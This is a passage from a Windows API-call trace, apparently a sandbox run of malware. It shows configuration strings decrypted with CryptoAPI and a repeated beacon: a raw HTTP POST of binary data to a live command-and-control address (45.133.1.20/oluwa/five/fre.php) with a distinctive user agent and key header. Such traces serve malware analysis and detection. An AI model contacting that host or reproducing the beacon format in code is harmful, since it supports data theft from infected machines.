Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0278.135] recv (in: s=0xa04, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0278.215] GetProcessHeap () returned 0x6a0000 [0278.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0278.216] GetProcessHeap () returned 0x6a0000 [0278.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0278.216] GetProcessHeap () returned 0x6a0000 [0278.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf0 | out: hHeap=0x6a0000) returned 1 [0278.217] GetProcessHeap () returned 0x6a0000 [0278.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0278.217] closesocket (s=0xa04) returned 0 [0278.220] GetProcessHeap () returned 0x6a0000 [0278.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0278.220] GetProcessHeap () returned 0x6a0000 [0278.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.220] GetProcessHeap () returned 0x6a0000 [0278.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0278.221] GetProcessHeap () returned 0x6a0000 [0278.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0278.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1798) returned 0xa04 [0278.228] Sleep (dwMilliseconds=0xea60) [0278.231] GetProcessHeap () returned 0x6a0000 [0278.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0278.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.232] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.242] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0278.249] GetProcessHeap () returned 0x6a0000 [0278.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.264] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0278.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.265] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.266] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.266] GetProcessHeap () returned 0x6a0000 [0278.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.268] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0278.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.269] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0278.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.269] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0278.269] GetProcessHeap () returned 0x6a0000 [0278.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.271] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.272] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.275] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.276] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.276] GetProcessHeap () returned 0x6a0000 [0278.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0278.276] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.276] GetProcessHeap () returned 0x6a0000 [0278.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0278.277] GetProcessHeap () returned 0x6a0000 [0278.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.277] GetProcessHeap () returned 0x6a0000 [0278.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0278.277] GetProcessHeap () returned 0x6a0000 [0278.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0278.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.278] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.284] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0278.290] GetProcessHeap () returned 0x6a0000 [0278.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0278.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.291] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0278.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.292] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.293] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.293] GetProcessHeap () returned 0x6a0000 [0278.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0278.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.294] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0278.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.295] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0278.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.298] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0278.298] GetProcessHeap () returned 0x6a0000 [0278.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.299] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0278.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.300] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0278.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.301] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0278.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0278.302] GetProcessHeap () returned 0x6a0000 [0278.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0278.302] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0278.302] GetProcessHeap () returned 0x6a0000 [0278.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0278.303] socket (af=2, type=1, protocol=6) returned 0xa08 [0278.303] connect (s=0xa08, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0278.327] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0278.327] GetProcessHeap () returned 0x6a0000 [0278.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0278.327] GetProcessHeap () returned 0x6a0000 [0278.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0278.328] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.330] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.330] GetProcessHeap () returned 0x6a0000 [0278.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9b70 [0278.330] GetProcessHeap () returned 0x6a0000 [0278.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0278.331] GetProcessHeap () returned 0x6a0000 [0278.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0278.331] GetProcessHeap () returned 0x6a0000 [0278.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0278.331] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.332] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.332] GetProcessHeap () returned 0x6a0000 [0278.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0278.332] GetProcessHeap () returned 0x6a0000 [0278.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0278.333] send (s=0xa08, buf=0x6bd460*, len=242, flags=0) returned 242 [0278.334] send (s=0xa08, buf=0x6bb998*, len=159, flags=0) returned 159 [0278.334] GetProcessHeap () returned 0x6a0000 [0278.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0278.334] recv (in: s=0xa08, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0278.404] GetProcessHeap () returned 0x6a0000 [0278.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0278.407] GetProcessHeap () returned 0x6a0000 [0278.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0278.407] GetProcessHeap () returned 0x6a0000 [0278.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b70 | out: hHeap=0x6a0000) returned 1 [0278.408] GetProcessHeap () returned 0x6a0000 [0278.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0278.408] closesocket (s=0xa08) returned 0 [0278.409] GetProcessHeap () returned 0x6a0000 [0278.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0278.409] GetProcessHeap () returned 0x6a0000 [0278.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.410] GetProcessHeap () returned 0x6a0000 [0278.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0278.410] GetProcessHeap () returned 0x6a0000 [0278.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0278.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x179c) returned 0xa08 [0278.413] Sleep (dwMilliseconds=0xea60) [0278.415] GetProcessHeap () returned 0x6a0000 [0278.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0278.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0278.444] GetProcessHeap () returned 0x6a0000 [0278.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.447] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0278.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.449] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.450] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.450] GetProcessHeap () returned 0x6a0000 [0278.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.451] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0278.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.458] CryptDestroyKey (hKey=0x6ad060) returned 1 [0278.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.459] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0278.459] GetProcessHeap () returned 0x6a0000 [0278.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.463] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.464] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.466] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.467] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.467] GetProcessHeap () returned 0x6a0000 [0278.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0278.467] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.467] GetProcessHeap () returned 0x6a0000 [0278.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0278.469] GetProcessHeap () returned 0x6a0000 [0278.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.469] GetProcessHeap () returned 0x6a0000 [0278.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0278.470] GetProcessHeap () returned 0x6a0000 [0278.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0278.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.471] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0278.502] GetProcessHeap () returned 0x6a0000 [0278.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0278.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.504] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0278.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.505] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.509] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.509] GetProcessHeap () returned 0x6a0000 [0278.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0278.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.511] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0278.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.512] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0278.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.513] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0278.513] GetProcessHeap () returned 0x6a0000 [0278.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.519] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0278.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.520] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0278.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.521] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0278.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.521] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0278.521] GetProcessHeap () returned 0x6a0000 [0278.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0278.522] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0278.522] GetProcessHeap () returned 0x6a0000 [0278.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0278.522] socket (af=2, type=1, protocol=6) returned 0xa0c [0278.522] connect (s=0xa0c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0278.548] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0278.548] GetProcessHeap () returned 0x6a0000 [0278.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0278.548] GetProcessHeap () returned 0x6a0000 [0278.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0278.549] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.550] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.550] GetProcessHeap () returned 0x6a0000 [0278.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba3b0 [0278.551] GetProcessHeap () returned 0x6a0000 [0278.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0278.554] GetProcessHeap () returned 0x6a0000 [0278.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0278.554] GetProcessHeap () returned 0x6a0000 [0278.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0278.555] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.556] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.556] GetProcessHeap () returned 0x6a0000 [0278.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0278.556] GetProcessHeap () returned 0x6a0000 [0278.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0278.557] send (s=0xa0c, buf=0x6bd460*, len=242, flags=0) returned 242 [0278.558] send (s=0xa0c, buf=0x6bb998*, len=159, flags=0) returned 159 [0278.558] GetProcessHeap () returned 0x6a0000 [0278.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0278.558] recv (in: s=0xa0c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0278.627] GetProcessHeap () returned 0x6a0000 [0278.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0278.628] GetProcessHeap () returned 0x6a0000 [0278.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0278.628] GetProcessHeap () returned 0x6a0000 [0278.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba3b0 | out: hHeap=0x6a0000) returned 1 [0278.629] GetProcessHeap () returned 0x6a0000 [0278.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0278.630] closesocket (s=0xa0c) returned 0 